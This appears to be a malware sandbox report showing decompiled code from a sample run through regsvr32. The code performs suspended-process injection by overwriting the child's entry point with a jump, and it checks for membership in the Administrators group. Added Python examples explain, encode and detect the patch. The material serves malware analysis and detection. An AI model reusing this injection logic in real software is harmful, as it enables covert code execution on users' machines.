            								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
            								if(_t70 != 0) {
            									GetLastError();
            									_t62 = E0099DADC( &_v40);
            									_t63 =  *0x9af8d0; // 0x452f8c0
            									if(_t62 != 0) {
            										_push(0xea60);
            										_push(_t70);
            										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
            											_t86 = _t86 + 1;
            										}
            										_t63 =  *0x9af8d0; // 0x452f8c0
            									}
            									FindCloseChangeNotification(_t70);
            								}
            								_t69 = _v8;
            							}
            						}
            						if(_v40 != 0) {
            							if(_t86 == 0) {
            								_t54 =  *0x9af8d0; // 0x452f8c0
            								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
            							}
            							_t50 =  *0x9af8d0; // 0x452f8c0
            							 *((intOrPtr*)(_t50 + 0x30))(_v36);
            							_t52 =  *0x9af8d0; // 0x452f8c0
            							 *((intOrPtr*)(_t52 + 0x30))(_v40);
            						}
            						_t69 = _t69 + 1;
            						_v8 = _t69;
            						if(_t69 < 2) {
            							continue;
            						} else {
            							break;
            						}
            					}
            					_t67 = _v16;
            					_t45 = _v12 + 1;
            					_v12 = _t45;
            					if(_t45 < _t67) {
            						continue;
            					} else {
            						break;
            					}
            					do {
            						goto L20;
            					} while (_t67 != 0);
            					goto L21;
            				}
            				L20:
            				E00998DDF(_t87, 0xfffffffe);
            				_t87 = _t87 + 4;
            				_t67 = _t67 - 1;
            			}
            • Address column: 0x0099d88f to 0x0099d9dd (one address per line of the listing above, 0x00000000 for lines without one), rendered beside the C code in the original report.

            APIs
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
              • Part of subcall function 0099BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0099BE52
              • Part of subcall function 0099D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0099DA40
              • Part of subcall function 0099D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0099DA89
              • Part of subcall function 0099D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0099DAA6
              • Part of subcall function 0099D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0099DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0099D939
              • Part of subcall function 0099DADC: ResumeThread.KERNELBASE(?,0099D947,?,?,00000001), ref: 0099DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0099D964
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: 1dab45250752cc32c50ca4b92e2e4e66382ca07e458d6cf4485edfa261370f15
            • Instruction ID: c0340ee95125cf3dbd52fa6d0f513245a17f590b73a5459c4e32da4fcd85dc0e
            • Opcode Fuzzy Hash: 1dab45250752cc32c50ca4b92e2e4e66382ca07e458d6cf4485edfa261370f15
            • Instruction Fuzzy Hash: 11415072A02209AFCF10EFADD9C5BAE77F9FF89310F144069E905A7251DB349E008B60
            Uniqueness

            Uniqueness Score: -1.00%
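Worked example for the injection path above (E0099D889 calling E0099BE10 and E0099D9DE). This is an added example, not code from the report or the sample. The API trace shows CreateProcessW with dwCreationFlags 4 (CREATE_SUSPENDED), GetThreadContext with ContextFlags 0x10002 (CONTEXT_INTEGER on x86, which in a freshly suspended process yields eax = image entry point), NtProtectVirtualMemory to 0x4 (PAGE_READWRITE), an NtWriteVirtualMemory of 5 bytes whose first byte is 0xE9, a second NtProtectVirtualMemory, then ResumeThread and a 0xEA60 ms (60 s) wait through a resolved table slot. 0xE9 is the x86 `jmp rel32` opcode, so the 5-byte write redirects the child's first instruction; that the patched address is the entry point taken from the thread context is an inference from those flags, not something the report states. The code below encodes such a patch, decodes one found in a dumped image and flags a jump that leaves the image's own range. Image bytes, base and target are constructed for the demo.

```python
"""Entry-point jmp-rel32 patch: encoding and detection.

Added example; not code from the report or the sample. Models the 5-byte
0xE9 write seen in the NtWriteVirtualMemory call of E0099D9DE.
"""
import struct
from typing import Optional, Tuple

JMP_REL32 = 0xE9
JMP_LEN = 5


def encode_jmp(src: int, dst: int) -> bytes:
    """5-byte `jmp rel32` placed at `src` that lands on `dst`.

    rel32 is relative to the end of the instruction (src + 5), signed.
    """
    rel = dst - (src + JMP_LEN)
    if not -0x80000000 <= rel <= 0x7FFFFFFF:
        raise ValueError("target not reachable with rel32")
    return bytes([JMP_REL32]) + struct.pack("<i", rel)


def decode_jmp(src: int, code: bytes) -> Optional[int]:
    """Target of a `jmp rel32` at `src`, or None if `code` is not one."""
    if len(code) < JMP_LEN or code[0] != JMP_REL32:
        return None
    rel = struct.unpack("<i", code[1:JMP_LEN])[0]
    return (src + JMP_LEN + rel) & 0xFFFFFFFF  # 32-bit process


def find_entry_hook(image: bytes, image_base: int,
                    entry_va: int) -> Optional[Tuple[int, bool]]:
    """Inspect the bytes at a dumped image's entry point.

    Returns (target, leaves_image) when the entry starts with `jmp rel32`,
    else None. A target outside [image_base, image_base + len(image)) is
    the pattern the sandbox reports as "overwrites code with unconditional
    jumps": a normal entry stub does not leave its module on the first
    instruction, while the patch here diverts into a foreign allocation.
    """
    off = entry_va - image_base
    if not 0 <= off < len(image):
        raise ValueError("entry point outside image")
    target = decode_jmp(entry_va, image[off:off + JMP_LEN])
    if target is None:
        return None
    inside = image_base <= target < image_base + len(image)
    return target, not inside


if __name__ == "__main__":
    # Constructed image: base 0x400000, entry 0x401000, patched to jump
    # to 0x990000 (the dump base in this report, used only as a sample).
    base, entry = 0x00400000, 0x00401000
    img = bytearray(0x2000)
    img[0x1000:0x1005] = encode_jmp(entry, 0x00990000)
    print(find_entry_hook(bytes(img), base, entry))
```

For triage of a suspended-then-resumed child, read the first 5 bytes at the entry point before ResumeThread (or from a memory dump) and run `find_entry_hook`; a `leaves_image` result pointing into a private, executable region is the injected payload's entry. Note that FindCloseChangeNotification in the trace is most likely CloseHandle, as the two resolve to the same kernelbase address and symbolisation picks either name; this is an inference.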

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
            				long _v8;
            				intOrPtr _t15;
            				WCHAR* _t23;
            				long _t24;
            				void* _t28;
            				void* _t31;
            				intOrPtr _t36;
            				void* _t41;
            				void* _t48;
            				intOrPtr* _t49;
            
            				_push(__ecx);
            				if(_a8 != 1) {
            					__eflags = _a8;
            					if(_a8 != 0) {
            						L7:
            						__eflags = 1;
            						return 1;
            					}
            					_t15 =  *0x9af8d0; // 0x452f8c0
            					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
            					L3:
            					return 0;
            				}
            				E00998DB4();
            				E00999787();
            				 *0x9af8e8 = _a4;
            				E009A3D36(_a4);
            				 *_t49 = 0xf2e;
            				 *0x9af8d0 = E0099F0D9(0x9aca88, 0x138);
            				 *_t49 = 0xe8d;
            				_t23 = E00999F85(0x9aca88);
            				_pop(_t41);
            				_a8 = _t23;
            				_t24 = GetFileAttributesW(_t23); // executed
            				_push( &_a8);
            				if(_t24 == 0xffffffff) {
            					E00998D9A();
            					 *_t49 = 0x1f4;
            					_t28 = E0099FCDA(E0099109A(_t41));
            					_a8 = _t28;
            					__eflags = _t28;
            					if(_t28 != 0) {
            						_t48 = 0x54;
            						 *0x9af8e0 = E0099F0D9(0x9acbf0, _t48);
            						E0099647A(_t48, __eflags);
            						E00998DDF( &_a8, 0xfffffffe);
            						_t36 =  *0x9af8d0; // 0x452f8c0
            						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
            					}
            					_v8 = 0;
            					_t31 = CreateThread(0, 0, E009963A2, 0, 0,  &_v8);
            					 *0x9af8f4 = _t31;
            					__eflags = _t31;
            					if(_t31 == 0) {
            						goto L3;
            					} else {
            						goto L7;
            					}
            				}
            				E00998D9A();
            				goto L3;
            			}
            • Address column: 0x00996606 to 0x009966ff (one address per line of the listing above, 0x00000000 for lines without one), rendered beside the C code in the original report.

            APIs
              • Part of subcall function 00998DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,00996616), ref: 00998DBD
              • Part of subcall function 0099F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,009ACA88,?,0099663F,?), ref: 0099F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 00996655
            • CreateThread.KERNELBASE(00000000,00000000,009963A2,00000000,00000000,?), ref: 009966DC
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: 6a8e4745cb2088ffc2b29b783c38fdadf292839e0e7bc0e6c3cc6b5d05415620
            • Instruction ID: bf56cd113f0baa78466b4f92b6fb4ea832b728037a178fc0d21a005db434d07c
            • Opcode Fuzzy Hash: 6a8e4745cb2088ffc2b29b783c38fdadf292839e0e7bc0e6c3cc6b5d05415620
            • Instruction Fuzzy Hash: 15217AB1514205AFDF04AFBDE816B6E37E8AF86310F10852AF15ACA1D1EF78C9409B61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 329 99f0d9-99f0f9 call 999f6b 332 99f0fb-99f101 GetModuleHandleA 329->332 333 99f103-99f108 LoadLibraryA 329->333 334 99f10a-99f10c 332->334 333->334 335 99f11b-99f129 call 998d87 334->335 336 99f10e-99f113 call 99f08e 334->336 339 99f118-99f119 336->339 339->335
            C-Code - Quality: 47%
            			E0099F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
            				char _v8;
            				char _t5;
            				struct HINSTANCE__* _t7;
            				void* _t10;
            				void* _t12;
            				void* _t22;
            				void* _t25;
            
            				_push(__ecx);
            				_t12 = __ecx;
            				_t22 = __edx;
            				_t5 = E00999F6B(_a4);
            				_t25 = 0;
            				_v8 = _t5;
            				_push(_t5);
            				if(_a4 != 0xf2e) {
            					_t7 = LoadLibraryA(); // executed
            				} else {
            					_t7 = GetModuleHandleA();
            				}
            				if(_t7 != 0) {
            					_t10 = E0099F08E(_t12, _t22, _t7); // executed
            					_t25 = _t10;
            				}
            				E00998D87( &_v8);
            				return _t25;
            			}
            • Address column: 0x0099f0dc to 0x0099f129 (one address per line of the listing above), rendered beside the C code in the original report.

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,009ACA88,?,0099663F,?), ref: 0099F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,009ACA88,?,0099663F,?), ref: 0099F108
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: b8ca7bbb35f43a7a700dc1eb33fd1668d54985cd4d535760c0a65b824c45a08f
            • Instruction ID: 9992f8e24e46978e44fd4ea18a4b5174d0ced29fe42c3a14b89e6500fd087767
            • Opcode Fuzzy Hash: b8ca7bbb35f43a7a700dc1eb33fd1668d54985cd4d535760c0a65b824c45a08f
            • Instruction Fuzzy Hash: E9F0A732318114EBDB14ABADDC5556AF7EDDF99391714413AF002D7151DEB08D4197D0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 341 99ca5a-99ca79 call 99c92f 344 99ca7f-99ca96 call 99c986 341->344 345 99cb14-99cb17 341->345 348 99ca98-99cab9 344->348 349 99caf6-99cb04 FindCloseChangeNotification 344->349 348->349 355 99cabb-99cabd 348->355 350 99cb12 349->350 351 99cb06-99cb11 call 998ddf 349->351 350->345 351->350 356 99cae9-99caf4 355->356 357 99cabf-99cac2 355->357 356->349 358 99cac5-99cad4 357->358 361 99cae6-99cae8 358->361 362 99cad6-99cae2 358->362 361->356 362->358 363 99cae4 362->363 363->356
            C-Code - Quality: 47%
            			E0099CA5A(void* __ecx, void* __esi) {
            				intOrPtr* _v8;
            				char _v12;
            				void* _v16;
            				char _v20;
            				char _v24;
            				short _v28;
            				char _v32;
            				void* _t20;
            				intOrPtr* _t21;
            				intOrPtr _t29;
            				intOrPtr _t31;
            				intOrPtr* _t33;
            				intOrPtr _t34;
            				char _t37;
            				union _TOKEN_INFORMATION_CLASS _t44;
            				char _t45;
            				intOrPtr* _t48;
            
            				_t37 = 0;
            				_v28 = 0x500;
            				_t45 = 0;
            				_v32 = 0;
            				_t20 = E0099C92F(__ecx);
            				_v16 = _t20;
            				if(_t20 != 0) {
            					_push( &_v24);
            					_t44 = 2;
            					_t21 = E0099C986(_t44); // executed
            					_t48 = _t21;
            					_v20 = _t48;
            					if(_t48 == 0) {
            						L10:
            						FindCloseChangeNotification(_v16);
            						if(_t48 != 0) {
            							E00998DDF( &_v20, _t37);
            						}
            						return _t45;
            					}
            					_push( &_v12);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0x220);
            					_push(0x20);
            					_push(2);
            					_push( &_v32);
            					_t29 =  *0x9af8d8; // 0x452fab0
            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
            						goto L10;
            					}
            					if( *_t48 <= 0) {
            						L9:
            						_t31 =  *0x9af8d8; // 0x452fab0
            						 *((intOrPtr*)(_t31 + 0x10))(_v12);
            						_t37 = 0;
            						goto L10;
            					}
            					_t9 = _t48 + 4; // 0x4
            					_t33 = _t9;
            					_v8 = _t33;
            					while(1) {
            						_push(_v12);
            						_push( *_t33);
            						_t34 =  *0x9af8d8; // 0x452fab0
            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
            							break;
            						}
            						_t37 = _t37 + 1;
            						_t33 = _v8 + 8;
            						_v8 = _t33;
            						if(_t37 <  *_t48) {
            							continue;
            						}
            						goto L9;
            					}
            					_t45 = 1;
            					goto L9;
            				}
            				return _t20;
            			}
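Worked example of the group walk that E0099CA5A above performs. This is an added example, not code from the report or the sample. The listing stores an identifier authority of {0,0,0,0,0,5} (`_v32 = 0`, `_v28 = 0x500`), calls a resolved table slot with that authority, sub-authority count 2 and values 0x20 and 0x220 plus a PSID out-pointer, queries the token with information class 2 (TokenGroups) through E0099C986, then compares the SID of each 8-byte {PSID, Attributes} entry against the one it built. Those constants are SECURITY_NT_AUTHORITY, SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS, i.e. S-1-5-32-544 (BUILTIN\Administrators). That the three table slots are AllocateAndInitializeSid, EqualSid and FreeSid is inferred from the argument shapes and is not stated by the report. The token buffer below is constructed in the 32-bit TOKEN_GROUPS layout the loop strides through; on a live host it would come from GetTokenInformation(TokenGroups).

```python
"""Binary SIDs and the BUILTIN\\Administrators walk of E0099CA5A.

Added example; not code from the report or the sample. Group lists are
constructed; the SID constants are the documented well-known values.
"""
import struct
from typing import List, Tuple

SID_REVISION = 1
ADMINS_SID = "S-1-5-32-544"      # authority 5, sub-authorities 0x20, 0x220
SE_GROUP_ENABLED = 0x00000004
SE_GROUP_USE_FOR_DENY_ONLY = 0x00000010

Group = Tuple[bytes, int]        # (binary SID, attributes)


def sid_from_string(text: str) -> bytes:
    """S-R-A-S1-S2... -> binary SID: revision, sub-authority count,
    6-byte big-endian authority, little-endian DWORD sub-authorities."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID: %r" % text)
    rev, auth = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if rev != SID_REVISION or not 0 <= auth < (1 << 48) or len(subs) > 15:
        raise ValueError("malformed SID: %r" % text)
    return (bytes([rev, len(subs)]) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_length(data: bytes) -> int:
    """Byte length of the SID at the start of `data` (from its count byte)."""
    if len(data) < 8 or data[0] != SID_REVISION or data[1] > 15:
        raise ValueError("malformed binary SID")
    return 8 + 4 * data[1]


def sid_to_string(data: bytes) -> str:
    n = sid_length(data)
    if len(data) < n:
        raise ValueError("truncated binary SID")
    auth = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % data[1], data, 8)
    return "S-%d-%d" % (data[0], auth) + "".join("-%d" % s for s in subs)


def sids_equal(a: bytes, b: bytes) -> bool:
    """EqualSid semantics: same length and identical bytes over it."""
    n = sid_length(a)
    return n == sid_length(b) and a[:n] == b[:n]


def build_token_groups(groups: List[Group], base: int) -> bytes:
    """32-bit TOKEN_GROUPS: DWORD GroupCount, then GroupCount
    {PSID, DWORD Attributes} pairs (the 8-byte stride in the listing),
    SIDs stored after the array. `base` is the pretend buffer address,
    since PSID is an absolute pointer."""
    off = 4 + 8 * len(groups)
    entries, sids = [], b""
    for sid, attrs in groups:
        entries.append(struct.pack("<II", base + off, attrs))
        sids += sid
        off += sid_length(sid)
    return struct.pack("<I", len(groups)) + b"".join(entries) + sids


def parse_token_groups(buf: bytes, base: int) -> List[Group]:
    count = struct.unpack_from("<I", buf, 0)[0]
    out: List[Group] = []
    for i in range(count):
        psid, attrs = struct.unpack_from("<II", buf, 4 + 8 * i)
        off = psid - base
        if not 0 <= off < len(buf):
            raise ValueError("PSID points outside the buffer")
        n = sid_length(buf[off:off + 8])
        if off + n > len(buf):
            raise ValueError("SID runs past the buffer")
        out.append((buf[off:off + n], attrs))
    return out


def is_admin_as_in_listing(groups: List[Group]) -> bool:
    """What E0099CA5A computes: any group SID equal to S-1-5-32-544,
    with the Attributes DWORD never looked at."""
    admins = sid_from_string(ADMINS_SID)
    return any(sids_equal(sid, admins) for sid, _ in groups)


def is_admin_effective(groups: List[Group]) -> bool:
    """Same walk, honouring the attributes. A UAC-filtered token of an
    administrator still lists BUILTIN\\Administrators, marked
    SE_GROUP_USE_FOR_DENY_ONLY, so the attribute-blind check reports
    'admin' for a medium-integrity process while this one does not."""
    admins = sid_from_string(ADMINS_SID)
    for sid, attrs in groups:
        if sids_equal(sid, admins):
            return bool(attrs & SE_GROUP_ENABLED) and not (attrs & SE_GROUP_USE_FOR_DENY_ONLY)
    return False
```

The caveat for anyone reproducing the sample's decision logic: because the loop compares only the PSID and ignores the Attributes DWORD, it answers "administrator" for the filtered token of a logged-on admin under UAC, which is exactly the case where the process is not elevated. CheckTokenMembership, or the attribute check in `is_admin_effective`, gives the correct answer.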
            • Address column: 0x0099ca61 to 0x0099cb17 (one address per line of the listing above, 0x00000000 for lines without one), rendered beside the C code in the original report.

            APIs
              • Part of subcall function 0099C92F: GetCurrentThread.KERNEL32 ref: 0099C942
              • Part of subcall function 0099C92F: GetLastError.KERNEL32(?,?,0099CA74,00000000,00990000), ref: 0099C950
              • Part of subcall function 0099C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00990000,00000000,00000000,?,0099CA07,00000000,00000000,?,0099CA30), ref: 0099C9A1
              • Part of subcall function 0099C986: GetLastError.KERNEL32(?,0099CA07,00000000,00000000,?,0099CA30,00001644,?,0099E053), ref: 0099C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00990000), ref: 0099CAFE
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$ChangeCloseCurrentFindInformationNotificationThreadToken
            • String ID:
            • API String ID: 3430231349-0
            • Opcode ID: c95803c7f08cba529b75e2e2c1bde2be13d4712e39b9fe19b59cac35be8a7179
            • Instruction ID: 67ef4083e0d533e6d4dbebb746edd1a1b95662a9e481d8883548aa382d220768
            • Opcode Fuzzy Hash: c95803c7f08cba529b75e2e2c1bde2be13d4712e39b9fe19b59cac35be8a7179
            • Instruction Fuzzy Hash: C82149B2A05209AFDB10DFEDDC85AAEB7F8EF48700B104469E501E7261E7309A419B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 364 9963a2-9963bb call 99651e GetOEMCP call 99dfc2 369 9963bd-9963be 364->369 370 9963c0-9963eb call 9a3c36 364->370 371 996435 369->371 374 9963ed-9963f3 370->374 375 9963f5-9963fb call 99d889 370->375 376 99640f-99641b 374->376 380 996400-996407 375->380 378 99642d call 993597 376->378 379 99641d-996422 call 9961e8 376->379 386 996432-996434 378->386 379->386 383 996409 380->383 384 996424-99642b 380->384 383->376 384->378 384->386 386->371
            C-Code - Quality: 100%
            			E009963A2(void* __fp0) {
            				void* __ecx;
            				intOrPtr _t13;
            				intOrPtr _t14;
            				signed int _t16;
            				intOrPtr _t17;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				void* _t27;
            
            				_t32 = __fp0;
            				E0099651E();
            				GetOEMCP();
            				_t13 = E0099DFC2(__fp0); // executed
            				 *0x9af8d4 = _t13;
            				if(_t13 != 0) {
            					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
            					_t14 =  *0x9af8d4; // 0x452fc00
            					E009A3C36( *((intOrPtr*)(_t14 + 0x224)));
            					_t26 =  *0x9af8d4; // 0x452fc00
            					_t25 = _t27;
            					__eflags =  *(_t26 + 0x1898) & 0x00010000;
            					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
            						_t16 = E0099D889(_t26); // executed
            						__eflags = _t16;
            						_t17 =  *0x9af8d4; // 0x452fc00
            						if(_t16 != 0) {
            							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
            							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
            								L10:
            								__eflags = 0;
            								return 0;
            							}
            							L9:
            							E00993597();
            							goto L10;
            						}
            						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
            						L6:
            						_t20 =  *0x9af8d4; // 0x452fc00
            						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
            						if(__eflags == 0) {
            							goto L9;
            						}
            						E009961E8(_t25, _t26, __eflags, _t32);
            						goto L10;
            					}
            					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
            					goto L6;
            				}
            				return _t13 + 1;
            			}
            0x009963a2
            0x009963a2
            0x009963a7
            0x009963ae
            0x009963b3
            0x009963bb
            0x009963c4
            0x009963ca
            0x009963d5
            0x009963da
            0x009963e0
            0x009963e1
            0x009963eb
            0x009963fb
            0x00996400
            0x00996402
            0x00996407
            0x00996424
            0x0099642b
            0x00996432
            0x00996432
            0x00000000
            0x00996434
            0x0099642d
            0x0099642d
            0x00000000
            0x0099642d
            0x00996409
            0x0099640f
            0x0099640f
            0x00996414
            0x0099641b
            0x00000000
            0x00000000
            0x0099641d
            0x00000000
            0x0099641d
            0x009963ed
            0x00000000
            0x009963ed
            0x00000000

            APIs
            • GetOEMCP.KERNEL32 ref: 009963A7
              • Part of subcall function 0099DFC2: GetCurrentProcessId.KERNEL32 ref: 0099DFE9
              • Part of subcall function 0099DFC2: GetLastError.KERNEL32 ref: 0099E0E3
              • Part of subcall function 0099DFC2: GetSystemMetrics.USER32(00001000), ref: 0099E0F3
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: afad13ba6d76932bfebd23d31a95ebb4652672af16c9e353c7547473f2dd5ca8
            • Instruction ID: f5ec034cfb88fccff0ef2b95a0c10cf74fab1097d7bcdfdafb235bdd0e1f71b8
            • Opcode Fuzzy Hash: afad13ba6d76932bfebd23d31a95ebb4652672af16c9e353c7547473f2dd5ca8
            • Instruction Fuzzy Hash: 49018F711182528FCB24EFACEA09BA673E4FF56310F19057AF1458A432C7388840D7E1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0099CA0A(void* __ecx) {
            				signed int _v8;
            				intOrPtr _t12;
            				void* _t13;
            				void* _t14;
            				void* _t17;
            				intOrPtr _t18;
            				void* _t23;
            
            				_v8 = _v8 & 0x00000000;
            				_t12 =  *0x9af8d8; // 0x452fab0
            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
            				if(_t13 != 0) {
            					_t14 = E0099C9F3(); // executed
            					_t23 = _t14;
            					if(_t23 != 0) {
            						FindCloseChangeNotification(_v8);
            						_t17 = _t23;
            					} else {
            						if(_v8 != _t14) {
            							_t18 =  *0x9af8d0; // 0x452f8c0
            							 *((intOrPtr*)(_t18 + 0x30))(_v8);
            						}
            						_t17 = 0;
            					}
            					return _t17;
            				} else {
            					return _t13;
            				}
            			}
            0x0099ca0e
            0x0099ca16
            0x0099ca1e
            0x0099ca23
            0x0099ca2b
            0x0099ca30
            0x0099ca34
            0x0099ca52
            0x0099ca55
            0x0099ca36
            0x0099ca39
            0x0099ca3b
            0x0099ca43
            0x0099ca43
            0x0099ca46
            0x0099ca46
            0x0099ca59
            0x0099ca26
            0x0099ca26
            0x0099ca26

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 848afc9c68a2f4e78559cf6a1c8723909ef61c39f433024aad4763c15fe18921
            • Instruction ID: 7ad299f3a4c7fa9fa75941372c5f6f56b0042af0a42350592f57192e13b049e0
            • Opcode Fuzzy Hash: 848afc9c68a2f4e78559cf6a1c8723909ef61c39f433024aad4763c15fe18921
            • Instruction Fuzzy Hash: CCF0F471A21158EFCF10DBA8CD55A9D72A8FF08345B1040A4A502E7560D778DE00AB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00996438() {
            				intOrPtr _t3;
            
            				_t3 =  *0x9af8d0; // 0x452f8c0
            				 *((intOrPtr*)(_t3 + 0x2c))( *0x9af8f4, 0xffffffff);
            				ExitProcess(0);
            			}
            0x00996438
            0x00996445
            0x0099644f

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0099644F
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: e3085101a3c9baabe42d785a48684cfe763b28fce2862763a38fbba94c2cbd39
            • Instruction ID: ad164364a787b7d30bb5c02912b1750e9756a1814c690253a8b5dd60865d427f
            • Opcode Fuzzy Hash: e3085101a3c9baabe42d785a48684cfe763b28fce2862763a38fbba94c2cbd39
            • Instruction Fuzzy Hash: 8DC002712281519FC740ABA8DD59F1437E0FF0A722F1986B5F52A9A5F9CA249400AB40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00998DC9(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x9af9b8, 8, _a4); // executed
            				return _t2;
            			}
            0x00998dd7
            0x00998dde

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: f06ecd1267f5f4148016d856744a9ccb1f438cbbc5fb8cb9c79c09630a5bc556
            • Instruction ID: 33739c0abedf4983fd94ac50a1585cb12b91d7759698a37196cf9d430474336f
            • Opcode Fuzzy Hash: f06ecd1267f5f4148016d856744a9ccb1f438cbbc5fb8cb9c79c09630a5bc556
            • Instruction Fuzzy Hash: E1B0923A098208BBCF411B85EC09A853F29FF4A791F004020F608084708B636461ABC1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E0099DADC(void* __ecx) {
            				signed int _t4;
            
            				_t4 = ResumeThread( *(__ecx + 4));
            				asm("sbb eax, eax");
            				return  ~_t4 & 0x00000001;
            			}
            0x0099dae4
            0x0099daec
            0x0099daf1

            APIs
            • ResumeThread.KERNELBASE(?,0099D947,?,?,00000001), ref: 0099DAE4
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
